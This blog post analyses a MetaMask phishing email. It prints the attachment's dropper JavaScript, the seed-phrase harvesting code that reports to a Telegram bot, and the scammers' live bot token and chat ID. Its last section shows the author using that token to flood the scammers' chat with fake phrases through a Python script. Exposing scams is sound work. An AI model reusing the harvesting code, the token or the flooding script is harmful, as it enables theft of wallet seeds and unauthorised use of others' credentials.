feat: metamask scam exploration post

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title = 'Exploration of a Random MetaMask Scam'
date = 2024-10-27T21:04:50+02:00
author = ''
draft = false
tags = ['random']
categories = []
+++
A few days ago, I received a pretty credible-looking MetaMask scam email stating that my account had been locked due to an attempt to connect a new device to it. Too bad I don't even own a MetaMask account, but despite that, I decided to spend a bit of time and look into how the whole scam worked, as I rarely receive any kind of spam nowadays.
<p align="center">
<img src="/images/metamask-scam-exploration/email.png" alt="Picture of the original email message" width="80%" />
</p>
## Email attachment
The attached HTML file `RemovedDevice.html` contained a bare-bones HTML structure with a bit of JS and a long Base64 encoded string which the attached script would decode and use jQuery to attach it back to the website body.
```javascript
$(document).ready(function () {
saveFile()
})
function saveFile(name, type, data) {
if (data != null && navigator.msSaveBlob)
return navigator.msSaveBlob(new Blob([data], { type: type }), name)
var a = $("<a style='display: none;'/>")
var encodedStringAtoB = "<base64-encoded-string>"
var decodedStringAtoB = atob(encodedStringAtoB)
const myBlob = new Blob([decodedStringAtoB], { type: "text/html" })
const url = window.URL.createObjectURL(myBlob)
a.attr("href", url)
$("body").append(a)
a[0].click()
window.URL.revokeObjectURL(url)
a.remove()
}
```
The resulting webpage would display 12/15/18/21/24 input fields for a crypto wallet seed phrases of various lengths.
The scammers were using Telegram as the backend, but didn't apparently care enough to even attempt to hide the API token and chat ID from the source with some obfuscation logic. Telegram also follows a certain logic with the chat IDs (private chats don't have a dash prefix, whereas supergroups and channels have a `-100` prefix) which helps in determining that the data is exfiltrated into a private chat instead of a group.
```javascript
// Add your telegram token,chatid
const token = "7686154983:AAFtpdY6iTjT7UiTK6cXh0fM2T4CKfjRHl0"
const chatId = "7839331161"
```
Before sending the collected information to the Telegram chat, the JavaScript code would also make a quick `GET` request to `ipinfo.io` to get the victim's public IP and related location data. This information would probably be used to pick a proxy for the wallet draining stage of this scam without raising any unwanted suspicions on MetaMask's end.
```javascript
wordForm1.addEventListener("submit", (e) => {
e.preventDefault()
errbox.classList.add("hide")
let regex = /[!`@#$~%^&*()\-+={}[\]:;"'<>,.?\/|\\]/
let regex2 = /\d/
let pass = false
for (let i = 0; i < word12Input.length; i++) {
if (regex.test(word12Input[i].value) || regex2.test(word12Input[i].value)) {
pass = true
}
}
if (pass) {
errbox.classList.remove("hide")
} else {
if (
word12_1.value === "" ||
word12_2.value === "" ||
word12_3.value === "" ||
word12_4.value === "" ||
word12_5.value === "" ||
word12_6.value === "" ||
word12_7.value === "" ||
word12_8.value === "" ||
word12_9.value === "" ||
word12_10.value === "" ||
word12_11.value === "" ||
word12_12.value === ""
) {
btncofirm1.disabled = true
} else {
preloader.classList.remove("hide")
let data = `IP: ${ip.ip}\nRegion: ${ip.region}\nTime Zone: ${ip.timezone}\nWord 1: ${word12_1.value} \nWord 2: ${word12_2.value} \nWord 3: ${word12_3.value} \nWord 4: ${word12_4.value} \nWord 5: ${word12_5.value} \nWord 6: ${word12_6.value} \nWord 7: ${word12_7.value} \nWord 8: ${word12_8.value} \nWord 9: ${word12_9.value} \nWord 10: ${word12_10.value} \nWord 11: ${word12_11.value} \nWord 12: ${word12_12.value}`
postData(data)
setTimeout(() => {
preloader.classList.add("hide")
noDone.classList.add("hide")
done.classList.remove("hide")
timer2(10)
}, 4000)
}
}
})
```
## Greetings
After discovering the valid token from the source, I had a sudden urge to try it out 🤔. I began with a simple `getMe` request:
```json
{
"ok": true,
"result": {
"id": 7686154983,
"is_bot": true,
"first_name": "wegomakeit",
"username": "wegomakeit_bot",
"can_join_groups": true,
"can_read_all_group_messages": false,
"supports_inline_queries": false,
"can_connect_to_business": false,
"has_main_web_app": false
}
}
```
And then proceeded to something a bit more interesting:
```python
import random
import requests
from time import sleep
from address import generate_residential_ip
from phrase import generate_seed_phrase, bip39_words
TOKEN = "7686154983:AAFtpdY6iTjT7UiTK6cXh0fM2T4CKfjRHl0"
CHAT_ID = "7839331161"
API_BASE_URL = f"https://api.telegram.org/bot{TOKEN}"
def construct_msg(words):
ip, region, timezone = generate_residential_ip()
phrase = generate_seed_phrase(words, random.choice([12, 15, 18, 21, 24]))
ip_str = f"IP: {ip}\nRegion: {region}\nTime Zone: {timezone}\n"
phrase_str = ""
for i, w in enumerate(phrase):
w_str = f"Word {i + 1}: {w} \n"
phrase_str += w_str
return ip_str + phrase_str
def send_msg(words, chat_id):
payload = {"chat_id": chat_id, "text": construct_msg(words)}
res = requests.post(f"{API_BASE_URL}/sendMessage", data=payload)
print(res.text)
words = bip39_words()
while True:
send_msg(words, CHAT_ID)
sleep(random.randint(1, 10))
```

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